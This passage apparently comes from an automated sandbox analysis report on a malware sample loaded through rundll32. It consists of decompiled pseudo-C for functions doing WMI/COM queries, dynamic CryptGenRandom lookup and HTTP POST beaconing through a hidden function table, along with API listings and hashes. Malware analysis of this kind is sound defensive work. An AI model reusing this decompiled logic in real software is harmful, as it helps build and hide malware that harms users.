            						_v12 = 0;
            						_v24 = 0;
            						__eflags = _v84;
            						if(_v84 == 0) {
            							break;
            						}
            						_t187 = _v28;
            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
            						__eflags = _t188;
            						if(_t188 >= 0) {
            							__imp__#20(_v24, 1,  &_v16);
            							__imp__#19(_v24, 1,  &_v48);
            							_t46 = _t320 + 0xc; // 0xc
            							_t253 = _t46;
            							_t327 = _t252 << 3;
            							_t47 = _t327 + 8; // 0x8
            							_t192 = E04458E5D(_t327, _t47);
            							__eflags = _t192;
            							if(_t192 == 0) {
            								__imp__#16(_v24);
            								_t193 = _v28;
            								 *((intOrPtr*)( *_t193 + 8))(_t193);
            								L46:
            								_t252 = _v20;
            								break;
            							}
            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E04458DC9( *(_t327 +  *_t253) << 3);
            							_t200 =  *_t253;
            							__eflags =  *(_t327 + _t200 + 4);
            							if( *(_t327 + _t200 + 4) == 0) {
            								_t136 = _t320 + 0xc; // 0xc
            								E04458DDF(_t136, 0);
            								E04458DDF( &_v36, 0);
            								__imp__#16(_v24);
            								_t205 = _v28;
            								 *((intOrPtr*)( *_t205 + 8))(_t205);
            								_t320 = _v36;
            								goto L46;
            							}
            							_t207 = _v16;
            							while(1) {
            								_v12 = _t207;
            								__eflags = _t207 - _v48;
            								if(_t207 > _v48) {
            									break;
            								}
            								_v44 = _v44 & 0x00000000;
            								_t209 =  &_v12;
            								__imp__#25(_v24, _t209,  &_v44);
            								__eflags = _t209;
            								if(_t209 < 0) {
            									break;
            								}
            								_t212 = E04459AB3(_v44);
            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
            								_t213 = _v28;
            								_t281 =  *_t213;
            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
            								__eflags = _t214;
            								if(_t214 < 0) {
            									L39:
            									__imp__#6(_v44);
            									_t207 = _v12 + 1;
            									__eflags = _t207;
            									continue;
            								}
            								_v92 = E04459F85(_t281, 0xcc1);
            								 *_t329 = 0xabe;
            								_t217 = E04459F85(_t281);
            								_t283 = _v80;
            								_v96 = _t217;
            								_t218 = _t283 & 0x0000ffff;
            								__eflags = _t218 - 0xb;
            								if(__eflags > 0) {
            									_t219 = _t218 - 0x10;
            									__eflags = _t219;
            									if(_t219 == 0) {
            										L35:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04458DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											L38:
            											E04458D9A( &_v92);
            											E04458D9A( &_v96);
            											__imp__#9( &_v80);
            											goto L39;
            										}
            										_push(_v72);
            										_push(L"%d");
            										L37:
            										_push(0xc);
            										_push(_t289);
            										E04459FE4();
            										_t329 = _t329 + 0x10;
            										goto L38;
            									}
            									_t230 = _t219 - 1;
            									__eflags = _t230;
            									if(_t230 == 0) {
            										L33:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04458DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											goto L38;
            										}
            										_push(_v72);
            										_push(L"%u");
            										goto L37;
            									}
            									_t235 = _t230 - 1;
            									__eflags = _t235;
            									if(_t235 == 0) {
            										goto L33;
            									}
            									__eflags = _t235 == 1;
            									if(_t235 == 1) {
            										goto L33;
            									}
            									L28:
            									__eflags = _t283 & 0x00002000;
            									if((_t283 & 0x00002000) == 0) {
            										_v88 = E04459F85(_t283, 0x2a);
            										E04459FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
            										E04458D9A( &_v88);
            										_t329 = _t329 + 0x18;
            										_t298 =  &_v616;
            										L31:
            										_t242 = E04459AB3(_t298);
            										L32:
            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
            										goto L38;
            									}
            									_t242 = E0445E9AE( &_v80);
            									goto L32;
            								}
            								if(__eflags == 0) {
            									__eflags = _v72 - 0xffff;
            									_t298 = L"TRUE";
            									if(_v72 != 0xffff) {
            										_t298 = L"FALSE";
            									}
            									goto L31;
            								}
            								_t243 = _t218 - 1;
            								__eflags = _t243;
            								if(_t243 == 0) {
            									goto L38;
            								}
            								_t244 = _t243 - 1;
            								__eflags = _t244;
            								if(_t244 == 0) {
            									goto L35;
            								}
            								_t245 = _t244 - 1;
            								__eflags = _t245;
            								if(_t245 == 0) {
            									goto L35;
            								}
            								__eflags = _t245 != 5;
            								if(_t245 != 5) {
            									goto L28;
            								}
            								_t298 = _v72;
            								goto L31;
            							}
            							__imp__#16(_v24);
            							_t210 = _v28;
            							 *((intOrPtr*)( *_t210 + 8))(_t210);
            							_t252 = _v20;
            							L42:
            							_t262 = _v32;
            							_t252 = _t252 + 1;
            							_v20 = _t252;
            							__eflags = _t262;
            							if(_t262 != 0) {
            								continue;
            							}
            							L48:
            							_t324 = _v40;
            							goto L49;
            						}
            						_t247 = _v28;
            						 *((intOrPtr*)( *_t247 + 8))(_t247);
            						goto L42;
            					}
            					_t262 = _v32;
            					goto L48;
            				} else {
            					E04458DDF( &_v36, _t322);
            					_t320 = _v36;
            					goto L53;
            				}
            			}
            0x0445ead3
            0x0445ead9
            0x0445eae0
            0x0445eae3
            0x0445eae6
            0x0445eaeb
            0x0445eaed
            0x0445eaf2
            0x0445ef37
            0x0445ef37
            0x0445eaff
            0x0445eb01
            0x0445eb04
            0x0445eb07
            0x0445ef1c
            0x0445ef22
            0x0445ef2c
            0x00000000
            0x0445ef31
            0x0445eb12
            0x0445eb19
            0x0445eb20
            0x0445eb23
            0x0445eb28
            0x0445eb2a
            0x0445eb2d
            0x0445eb30
            0x0445eb31
            0x0445eb3a
            0x0445eb40
            0x0445eb43
            0x0445eb4c
            0x0445eb51
            0x0445eb56
            0x0445eb6d
            0x0445eb7a
            0x0445eb7d
            0x0445eb84
            0x0445eb89
            0x0445eb90
            0x0445eb95
            0x0445eb9c
            0x0445eb9e
            0x0445ebaa
            0x0445ebad
            0x0445ebaf
            0x0445ef0c
            0x0445ef0d
            0x0445ef16
            0x00000000
            0x0445ef16
            0x0445ebb5
            0x0445ebb8
            0x0445ebbb
            0x0445ebbe
            0x0445ebc0
            0x0445eed8
            0x0445eedb
            0x0445eede
            0x0445eee0
            0x0445ef02
            0x0445ef07
            0x0445eee2
            0x0445eee5
            0x0445eef0
            0x0445eef7
            0x0445eef7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445ebc6
            0x0445ebc6
            0x0445ebd8
            0x0445ebdb
            0x0445ebdd
            0x00000000
            0x00000000
            0x0445ebe5
            0x0445ebe8
            0x0445ebeb
            0x0445ebee
            0x0445ebf1
            0x0445ebf4
            0x00000000
            0x00000000
            0x0445ebfa
            0x0445ec08
            0x0445ec0b
            0x0445ec0d
            0x0445ec26
            0x0445ec35
            0x0445ec3d
            0x0445ec3d
            0x0445ec40
            0x0445ec47
            0x0445ec4b
            0x0445ec51
            0x0445ec53
            0x0445eec0
            0x0445eec6
            0x0445eecc
            0x0445eecf
            0x0445eecf
            0x00000000
            0x0445eecf
            0x0445ec62
            0x0445ec76
            0x0445ec7a
            0x0445ec7c
            0x0445ec81
            0x0445ee8d
            0x0445ee93
            0x0445ee9e
            0x0445eea9
            0x0445eeaf
            0x0445eeb5
            0x0445eeb8
            0x00000000
            0x0445eeb8
            0x0445ec87
            0x0445ee5b
            0x0445ee5b
            0x0445ee5e
            0x0445ee61
            0x00000000
            0x00000000
            0x0445ec8f
            0x0445ec97
            0x0445ec9e
            0x0445eca4
            0x0445eca6
            0x00000000
            0x00000000
            0x0445ecaf
            0x0445ecc4
            0x0445ecca
            0x0445ecd3
            0x0445ecd6
            0x0445ecd9
            0x0445ecdb
            0x0445ee4e
            0x0445ee51
            0x0445ee5a
            0x0445ee5a
            0x00000000
            0x0445ee5a
            0x0445eceb
            0x0445ecee
            0x0445ecf5
            0x0445ecfb
            0x0445ecfe
            0x0445ed01
            0x0445ed04
            0x0445ed07
            0x0445ed43
            0x0445ed43
            0x0445ed46
            0x0445edef
            0x0445ee03
            0x0445ee13
            0x0445ee17
            0x0445ee19
            0x0445ee30
            0x0445ee34
            0x0445ee3d
            0x0445ee48
            0x00000000
            0x0445ee48
            0x0445ee1f
            0x0445ee20
            0x0445ee25
            0x0445ee25
            0x0445ee27
            0x0445ee28
            0x0445ee2d
            0x00000000
            0x0445ee2d
            0x0445ed4c
            0x0445ed4c
            0x0445ed4f
            0x0445edb7
            0x0445edcb
            0x0445eddb
            0x0445eddf
            0x0445ede1
            0x00000000
            0x00000000
            0x0445ede7
            0x0445ede8
            0x00000000
            0x0445ede8
            0x0445ed51
            0x0445ed51
            0x0445ed54
            0x00000000
            0x00000000
            0x0445ed56
            0x0445ed59
            0x00000000
            0x00000000
            0x0445ed5b
            0x0445ed5b
            0x0445ed61
            0x0445ed7a
            0x0445ed89
            0x0445ed92
            0x0445ed97
            0x0445ed9a
            0x0445eda0
            0x0445eda0
            0x0445eda5
            0x0445edb1
            0x00000000
            0x0445edb1
            0x0445ed66
            0x00000000
            0x0445ed66
            0x0445ed09
            0x0445ed30
            0x0445ed35
            0x0445ed3a
            0x0445ed3c
            0x0445ed3c
            0x00000000
            0x0445ed3a
            0x0445ed0b
            0x0445ed0b
            0x0445ed0e
            0x00000000
            0x00000000
            0x0445ed14
            0x0445ed14
            0x0445ed17
            0x00000000
            0x00000000
            0x0445ed1d
            0x0445ed1d
            0x0445ed20
            0x00000000
            0x00000000
            0x0445ed26
            0x0445ed29
            0x00000000
            0x00000000
            0x0445ed2b
            0x00000000
            0x0445ed2b
            0x0445ee6a
            0x0445ee70
            0x0445ee76
            0x0445ee79
            0x0445ee7c
            0x0445ee7c
            0x0445ee7f
            0x0445ee80
            0x0445ee83
            0x0445ee85
            0x00000000
            0x00000000
            0x0445eed5
            0x0445eed5
            0x00000000
            0x0445eed5
            0x0445ec0f
            0x0445ec15
            0x00000000
            0x0445ec15
            0x0445eed2
            0x00000000
            0x0445eb58
            0x0445eb5d
            0x0445eb62
            0x00000000
            0x0445eb66

            APIs
              • Part of subcall function 0445E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E498
              • Part of subcall function 0445E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4A9
              • Part of subcall function 0445E485: CoCreateInstance.OLE32(0446C8A0,00000000,00000001,0446C8B0,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4C0
              • Part of subcall function 0445E485: SysAllocString.OLEAUT32(00000000), ref: 0445E4CB
              • Part of subcall function 0445E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4F6
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0445EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0445EB87
            • SysFreeString.OLEAUT32(?), ref: 0445EF0D
            • SysFreeString.OLEAUT32(?), ref: 0445EF16
              • Part of subcall function 04458DDF: HeapFree.KERNEL32(00000000,00000000), ref: 04458E25
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 10172a3e4ffad5d93d9237fe031c4cb89d21e692db10e3fc684176c45b127480
            • Instruction ID: faee74862e6d97fe68906786a7a87d8891f141f6b9c1496be61e852872f0d8f4
            • Opcode Fuzzy Hash: 10172a3e4ffad5d93d9237fe031c4cb89d21e692db10e3fc684176c45b127480
            • Instruction Fuzzy Hash: 52E14171A00219EFEF14DFA5C884AEEBBB9FF48304F10455EE905A7262DB74BA05CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E04462951(intOrPtr* _a4) {
            				signed int _v8;
            				_Unknown_base(*)()* _v12;
            				char _v16;
            				_Unknown_base(*)()* _t15;
            				void* _t20;
            				intOrPtr* _t25;
            				intOrPtr* _t29;
            				struct HINSTANCE__* _t30;
            
            				_v8 = _v8 & 0x00000000;
            				_t30 = GetModuleHandleW(L"advapi32.dll");
            				if(_t30 == 0) {
            					L7:
            					return 1;
            				}
            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
            				if(_t25 == 0) {
            					goto L7;
            				}
            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
            				_v12 = _t15;
            				if(_t15 == 0) {
            					goto L7;
            				}
            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
            				if(_t29 == 0) {
            					goto L7;
            				}
            				_push(0xf0000000);
            				_push(1);
            				_push(0);
            				_push(0);
            				_push( &_v8);
            				if( *_t25() == 0) {
            					goto L7;
            				}
            				_t20 = _v12(_v8, 4,  &_v16);
            				 *_t29(_v8, 0);
            				if(_t20 == 0) {
            					goto L7;
            				}
            				 *_a4 = E044628AC( &_v16);
            				return 0;
            			}
            0x04462957
            0x04462969
            0x0446296d
            0x044629e1
            0x00000000
            0x044629e3
            0x0446297d
            0x04462981
            0x00000000
            0x00000000
            0x04462989
            0x0446298b
            0x04462990
            0x00000000
            0x00000000
            0x0446299a
            0x0446299e
            0x00000000
            0x00000000
            0x044629a0
            0x044629a5
            0x044629a7
            0x044629a9
            0x044629ae
            0x044629b3
            0x00000000
            0x00000000
            0x044629be
            0x044629c8
            0x044629cc
            0x00000000
            0x00000000
            0x044629db
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,04457C84), ref: 04462963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0446297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 04462989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 04462998
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: bda05ba0605649b29c97974297542f7f1a5acad8fddb60484c5b27500f015006
            • Instruction ID: 0b8f892e993dfed817391a5313a6b49cac07b5e73bbb8be2a3427f6b675fdc5b
            • Opcode Fuzzy Hash: bda05ba0605649b29c97974297542f7f1a5acad8fddb60484c5b27500f015006
            • Instruction Fuzzy Hash: BC11AC72B4471977DF11ABB59C42F9FB6ACAF85750F110162EA02F7240DAF0ED048956
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0445F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
            				signed int _v8;
            				signed int _v12;
            				char _v16;
            				char _v20;
            				char _v24;
            				intOrPtr _v28;
            				int _v32;
            				signed int _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char _v56;
            				int _v68;
            				void* _v72;
            				intOrPtr _v92;
            				int _v96;
            				void* _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				char* _v112;
            				char _v116;
            				char _v132;
            				void _v388;
            				void _v644;
            				intOrPtr _t94;
            				intOrPtr _t102;
            				signed int _t104;
            				intOrPtr* _t105;
            				intOrPtr _t110;
            				signed int _t111;
            				signed int _t112;
            				intOrPtr _t115;
            				signed int _t116;
            				char _t117;
            				intOrPtr _t119;
            				char _t122;
            				intOrPtr _t127;
            				signed int _t129;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				intOrPtr _t143;
            				intOrPtr _t145;
            				intOrPtr _t147;
            				intOrPtr _t153;
            				intOrPtr _t155;
            				intOrPtr _t159;
            				void* _t163;
            				signed int _t165;
            				void* _t166;
            				intOrPtr _t179;
            				signed int _t186;
            				char _t188;
            				signed int _t189;
            				void* _t190;
            				char _t193;
            				signed int _t194;
            				signed int _t195;
            				void* _t196;
            
            				_v24 = 4;
            				_v32 = 0;
            				_v28 = 1;
            				_t190 = __edx;
            				memset( &_v388, 0, 0x100);
            				memset( &_v644, 0, 0x100);
            				_t166 = 0x65;
            				_v56 = E04459F6B(_t166);
            				_v52 = E04459F6B(0xcc6);
            				_v48 = E04459F6B(0xe03);
            				_v44 = E04459F6B(0x64c);
            				_t94 = E04459F6B(0x80a);
            				_v36 = _v36 & 0;
            				_t188 = 0x3c;
            				_v40 = _t94;
            				E04458F63( &_v116, 0, 0x100);
            				_v108 = 0x10;
            				_v112 =  &_v132;
            				_v116 = _t188;
            				_v100 =  &_v388;
            				_v96 = 0x100;
            				_v72 =  &_v644;
            				_push( &_v116);
            				_push(0);
            				_v68 = 0x100;
            				_push(E0445A5D0(_t190));
            				_t102 =  *0x446f8f0; // 0x0
            				_push(_t190);
            				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
            					_t104 = 0;
            					__eflags = 0;
            					_v12 = 0;
            					do {
            						_t105 =  *0x446f8f0; // 0x0
            						_v8 = 0x8404f700;
            						_t189 =  *_t105( *0x446f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
            						__eflags = _t189;
            						if(_t189 != 0) {
            							E0445F73B(_t189);
            							_t110 =  *0x446f8f0; // 0x0
            							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
            							__eflags = _a24;
            							_t165 = _t111;
            							if(_a24 != 0) {
            								E0445A1F8(_a24);
            							}
            							__eflags = _t165;
            							if(_t165 != 0) {
            								__eflags = _v104 - 4;
            								_t112 = 0x8484f700;
            								if(_v104 != 4) {
            									_t112 = _v8;
            								}
            								_t115 =  *0x446f8f0; // 0x0
            								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
            								_v8 = _t116;
            								__eflags = _a24;
            								if(_a24 != 0) {
            									E0445A1F8(_a24);
            									_t116 = _v8;
            								}
            								__eflags = _t116;
            								if(_t116 != 0) {
            									__eflags = _v104 - 4;
            									if(_v104 == 4) {
            										E0445F6E9(_t116);
            									}
            									_t117 = E04459F6B(0x82e);
            									_t193 = _t117;
            									_v16 = _t193;
            									_t119 =  *0x446f8f0; // 0x0
            									_t194 = _v8;
            									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0445A5D0(_t193), _a4, _a8);
            									E04458D87( &_v16);
            									__eflags = _a24;
            									if(_a24 != 0) {
            										E0445A1F8(_a24);
            									}
            									__eflags = _v8;
            									if(_v8 != 0) {
            										L25:
            										_t122 = 8;
            										_v24 = _t122;
            										_v20 = 0;
            										_v16 = 0;
            										E04458F63( &_v20, 0, _t122);
            										_t127 =  *0x446f8f0; // 0x0
            										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
            										if(__eflags != 0) {
            											_t129 = E0445A102( &_v20, __eflags);
            											__eflags = _t129 - 0xc8;
            											if(_t129 == 0xc8) {
            												 *_a20 = _t194;
            												 *_a12 = _t189;
            												 *_a16 = _t165;
            												__eflags = 0;
            												return 0;
            											}
            											_v12 =  ~_t129;
            											L29:
            											_t135 =  *0x446f8f0; // 0x0
            											 *((intOrPtr*)(_t135 + 8))(_t194);
            											_t195 = _v12;
            											L30:
            											__eflags = _t165;
            											if(_t165 != 0) {
            												_t139 =  *0x446f8f0; // 0x0
            												 *((intOrPtr*)(_t139 + 8))(_t165);
            											}
            											__eflags = _t189;
            											if(_t189 != 0) {
            												_t179 =  *0x446f8f0; // 0x0
            												 *((intOrPtr*)(_t179 + 8))(_t189);
            											}
            											return _t195;
            										}
            										GetLastError();
            										_v12 = 0xfffffff8;
            										goto L29;
            									} else {
            										GetLastError();
            										_t143 =  *0x446f8f0; // 0x0
            										 *((intOrPtr*)(_t143 + 8))(_t194);
            										_t145 =  *0x446f8f0; // 0x0
            										_v8 = _v8 & 0x00000000;
            										 *((intOrPtr*)(_t145 + 8))(_t165);
            										_t147 =  *0x446f8f0; // 0x0
            										_t165 = 0;
            										__eflags = 0;
            										 *((intOrPtr*)(_t147 + 8))(_t189);
            										_t194 = _v8;
            										goto L21;
            									}
            								} else {
            									GetLastError();
            									_t153 =  *0x446f8f0; // 0x0
            									 *((intOrPtr*)(_t153 + 8))(_t165);
            									_t155 =  *0x446f8f0; // 0x0
            									_t165 = 0;
            									 *((intOrPtr*)(_t155 + 8))(_t189);
            									_t189 = 0;
            									_t194 = _v8;
            									goto L22;
            								}
            							} else {
            								GetLastError();
            								_t159 =  *0x446f8f0; // 0x0
            								 *((intOrPtr*)(_t159 + 8))(_t189);
            								L21:
            								_t189 = 0;
            								__eflags = 0;
            								goto L22;
            							}
            						}
            						GetLastError();
            						L22:
            						_t186 = _t194;
            						_t104 = _v12 + 1;
            						_v12 = _t104;
            						__eflags = _t104 - 2;
            					} while (_t104 < 2);
            					__eflags = _t186;
            					if(_t186 != 0) {
            						goto L25;
            					}
            					_t195 = 0xfffffffe;
            					goto L30;
            				}
            				_t163 = 0xfffffffc;
            				return _t163;
            			}
            0x0445f7b1
            0x0445f7bd
            0x0445f7c4
            0x0445f7d1
            0x0445f7d4
            0x0445f7e5
            0x0445f7ef
            0x0445f7fa
            0x0445f807
            0x0445f814
            0x0445f821
            0x0445f824
            0x0445f829
            0x0445f82e
            0x0445f830
            0x0445f838
            0x0445f840
            0x0445f847
            0x0445f853
            0x0445f856
            0x0445f864
            0x0445f867
            0x0445f86d
            0x0445f86e
            0x0445f870
            0x0445f879
            0x0445f87a
            0x0445f87f
            0x0445f885
            0x0445f88f
            0x0445f88f
            0x0445f891
            0x0445f896
            0x0445f8a0
            0x0445f8ab
            0x0445f8b4
            0x0445f8b6
            0x0445f8b8
            0x0445f8c7
            0x0445f8de
            0x0445f8e4
            0x0445f8e7
            0x0445f8eb
            0x0445f8ed
            0x0445f8f2
            0x0445f8f2
            0x0445f8f7
            0x0445f8f9
            0x0445f90f
            0x0445f913
            0x0445f918
            0x0445f91a
            0x0445f91a
            0x0445f92e
            0x0445f939
            0x0445f93c
            0x0445f93f
            0x0445f942
            0x0445f947
            0x0445f94c
            0x0445f94c
            0x0445f94f
            0x0445f951
            0x0445f977
            0x0445f97b
            0x0445f97f
            0x0445f97f
            0x0445f989
            0x0445f991
            0x0445f996
            0x0445f9a1
            0x0445f9a7
            0x0445f9b1
            0x0445f9b4
            0x0445f9b9
            0x0445f9bd
            0x0445f9c2
            0x0445f9c2
            0x0445f9c7
            0x0445f9cb
            0x0445fa16
            0x0445fa18
            0x0445fa1b
            0x0445fa23
            0x0445fa27
            0x0445fa2a
            0x0445fa3c
            0x0445fa47
            0x0445fa49
            0x0445fa5d
            0x0445fa62
            0x0445fa67
            0x0445fa9c
            0x0445faa1
            0x0445faa6
            0x0445faa8
            0x00000000
            0x0445faa8
            0x0445fa6b
            0x0445fa6e
            0x0445fa6e
            0x0445fa74
            0x0445fa77
            0x0445fa7a
            0x0445fa7a
            0x0445fa7c
            0x0445fa7e
            0x0445fa84
            0x0445fa84
            0x0445fa87
            0x0445fa89
            0x0445fa8b
            0x0445fa92
            0x0445fa92
            0x00000000
            0x0445fa95
            0x0445fa4b
            0x0445fa51
            0x00000000
            0x0445f9cd
            0x0445f9cd
            0x0445f9d3
            0x0445f9d9
            0x0445f9dc
            0x0445f9e1
            0x0445f9e6
            0x0445f9e9
            0x0445f9ee
            0x0445f9ee
            0x0445f9f1
            0x0445f9f4
            0x00000000
            0x0445f9f4
            0x0445f953
            0x0445f953
            0x0445f959
            0x0445f95f
            0x0445f962
            0x0445f967
            0x0445f96a
            0x0445f96d
            0x0445f96f
            0x00000000
            0x0445f96f
            0x0445f8fb
            0x0445f8fb
            0x0445f901
            0x0445f907
            0x0445f9f7
            0x0445f9f7
            0x0445f9f7
            0x00000000
            0x0445f9f7
            0x0445f8f9
            0x0445f8ba
            0x0445f9f9
            0x0445f9fc
            0x0445f9fe
            0x0445fa01
            0x0445fa04
            0x0445fa04
            0x0445fa0d
            0x0445fa0f
            0x00000000
            0x00000000
            0x0445fa13
            0x00000000
            0x0445fa13
            0x0445f889
            0x00000000

            APIs
            • memset.MSVCRT ref: 0445F7D4
            • memset.MSVCRT ref: 0445F7E5
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0445F8BA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: 8e9cb119b7c2d2ad8c45a554448c4167279de8144646e14866876dae64334762
            • Instruction ID: 8759a65efb3bdc4e982c89f754ca664fe65ca7c664780cb1657034ab41371f7c
            • Opcode Fuzzy Hash: 8e9cb119b7c2d2ad8c45a554448c4167279de8144646e14866876dae64334762
            • Instruction Fuzzy Hash: 45A18271A00719EFEF10DFA5D848AAE77B8FF48314F14406AE905E7252DB34AE49CB52
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: a3fc6619d4e47bb9cef55c05d7d773f03437e9b5510119e21d5cefe05d171da8
            • Instruction ID: b2391082117d51299a615a6eb1d7d73ea91e57da75bde83f6ae772d7f007b1de
            • Opcode Fuzzy Hash: a3fc6619d4e47bb9cef55c05d7d773f03437e9b5510119e21d5cefe05d171da8
            • Instruction Fuzzy Hash: ABE180B1A00209BFEF119F65CC41EBF7B69EF05349F10441AFD179A241E671E9618BA2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E0445503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
            				void _v532;
            				char _v548;
            				char _v580;
            				char _v584;
            				short _v588;
            				WCHAR* _v592;
            				WCHAR* _v596;
            				intOrPtr _v600;
            				char _v628;
            				char _v632;
            				void* __ebx;
            				void* __esi;
            				short _t47;
            				WCHAR* _t54;
            				WCHAR* _t55;
            				intOrPtr _t56;
            				signed int _t61;
            				void* _t65;
            				void* _t66;
            				WCHAR* _t67;
            				intOrPtr _t68;
            				WCHAR* _t70;
            				intOrPtr _t71;
            				WCHAR* _t73;
            				WCHAR* _t83;
            				intOrPtr _t84;
            				void* _t85;
            				intOrPtr _t86;
            				void* _t93;
            				intOrPtr _t94;
            				intOrPtr _t96;
            				void* _t99;
            				void* _t100;
            				WCHAR* _t101;
            				void* _t112;
            				WCHAR* _t116;
            				intOrPtr _t127;
            				void* _t128;
            				void* _t146;
            				WCHAR* _t149;
            				void* _t150;
            				void* _t152;
            				void* _t156;
            				WCHAR* _t157;
            				WCHAR* _t159;
            				signed int _t160;
            				signed int _t161;
            				intOrPtr* _t163;
            				signed int _t165;
            				void* _t168;
            				void* _t169;
            				intOrPtr* _t170;
            				void* _t175;
            
            				_t175 = __fp0;
            				_push(_t160);
            				_t99 = __edx;
            				_t156 = __ecx;
            				_t161 = _t160 | 0xffffffff;
            				memset( &_v532, 0, 0x20c);
            				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
            				_v592 = 1;
            				if(_t156 != 0) {
            					_t94 =  *0x446f8d4; // 0x450fc00
            					_t3 = _t94 + 0x110; // 0x45116d0
            					_t96 =  *0x446f8d8; // 0x450fab0
            					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
            				}
            				if(E0445CB85(_t156) != 0) {
            					L4:
            					_t47 = E0445C85A();
            					_push(_t99);
            					_v588 = _t47;
            					E0445C64D(_t47,  &_v580, _t173, _t175);
            					_t100 = E04454FFB( &_v580,  &_v580, _t173);
            					_t112 = E0445E34A( &_v580, E0445A5D0( &_v580), 0);
            					E0445C870(_t112,  &_v548, _t175);
            					_push(_t112);
            					_t54 = E04453174(_t156,  &_v580, _t173, _t175);
            					_v596 = _t54;
